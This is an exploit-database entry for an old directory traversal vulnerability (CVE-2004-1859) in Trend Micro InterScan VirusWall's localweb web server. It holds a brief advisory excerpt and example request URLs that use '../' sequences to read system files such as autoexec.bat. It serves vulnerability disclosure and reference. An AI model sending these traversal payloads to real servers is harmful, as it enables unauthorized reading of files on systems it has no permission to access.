Trend Micro Interscan VirusWall localweb - Directory Traversal

Author: Tri Huynh
type: webapps
platform: windows
port: 
date_added: 2004-03-24
date_updated: 2017-07-19
verified: 1
codes: CVE-2004-1859;OSVDB-4549
tags: 
aliases: 
screenshot_url: 
application_url: 

source: https://www.securityfocus.com/bid/9966/info

It has been reported that InterScan VirusWall may to a directory traversal vulnerability that may allow an attacker to request files from the '/ishttp/localweb' directory and any sub directories of 'localweb' with directory traversal strings such as '../'.

http://www.example.com/ishttpd/localweb/filename
http://www.example.com/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
http://www.example.com/ishttpd/localweb/java/?/../../../ishttpd.exe
↑